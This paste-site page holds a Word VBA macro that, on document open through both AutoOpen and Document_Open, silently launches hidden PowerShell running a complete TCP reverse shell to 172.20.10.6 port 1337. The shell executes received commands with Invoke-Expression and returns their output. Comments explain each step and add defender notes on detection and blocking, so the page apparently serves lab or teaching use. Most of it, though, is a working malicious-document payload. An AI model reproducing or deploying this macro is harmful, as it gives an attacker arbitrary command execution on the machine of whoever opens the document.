
reverse

Home - All the pastes - Authored by Thooms

' AutoOpen is one of Word's automatic macro names: it runs when the document
' is opened, provided macros are allowed to execute. Here it does nothing but
' call RunPSInline, so opening the file is the only user action needed.
' Triage note: an auto-run entry point that hands straight off to a process
' launcher is a strong indicator of a malicious document.
Sub AutoOpen()
    RunPSInline
End Sub

' Document_Open is the Word document-open event handler. It duplicates the
' AutoOpen trigger and calls the same RunPSInline routine, so the payload has
' two independent auto-run entry points. Both need to be accounted for when
' analysing or neutralising the document.
Sub Document_Open()
    RunPSInline
End Sub


' RunPSInline starts a hidden PowerShell process whose inline script is a
' plaintext TCP reverse shell.
'
' What the code shows:
'   - psCode retries once per second until a TCP connection to
'     172.20.10.6 port 1337 succeeds. The address is in RFC 1918 private
'     space, so the peer is on a local or lab network rather than the internet.
'   - Whatever arrives on the socket is passed to Invoke-Expression, and the
'     output is written back followed by a 'SHELL> ' prompt. The remote peer
'     therefore gets arbitrary command execution as the user who opened the
'     document.
'   - The stream is a bare TCPClient/StreamWriter with no TLS, so commands and
'     output are readable in a packet capture.
'
' Defender notes:
'   - An Office application spawning powershell.exe is a high-signal
'     parent/child relationship. The attack surface reduction rule that blocks
'     Office applications from creating child processes stops this launch.
'   - The whole script travels on the command line, so process-creation
'     logging with command-line capture and PowerShell script block logging
'     both record it (Net.Sockets.TCPClient, Invoke-Expression, the
'     address and port).
'   - "-ExecutionPolicy Bypass" is not a security boundary. Do not rely on
'     execution policy to prevent this; rely on macro blocking (for example
'     for files carrying Mark-of-the-Web) and application control.
Sub RunPSInline()
    Dim objShell As Object
    Dim psCode As String
    Dim cmd As String

    ' Inline PowerShell payload: connect-retry loop, then a read / Invoke-Expression / write-back loop.
    psCode = "do{Start-Sleep -Seconds 1;try{$TCPClient = New-Object Net.Sockets.TCPClient('172.20.10.6', 1337)} catch {}}until ($TCPClient.Connected);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0} ; $StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush();};WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String};WriteToStream ($Output)};$StreamWriter.Close()"
    ' Chr(34) is a double quote: the payload is passed as one quoted -Command argument.
    cmd = "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " & Chr(34) & psCode & Chr(34)
    
    Set objShell = CreateObject("WScript.Shell")
    ' Run arguments: window style 0 hides the console window; False returns without waiting,
    ' so the document opens normally while PowerShell keeps running in the background.
    objShell.Run cmd, 0, False
End Sub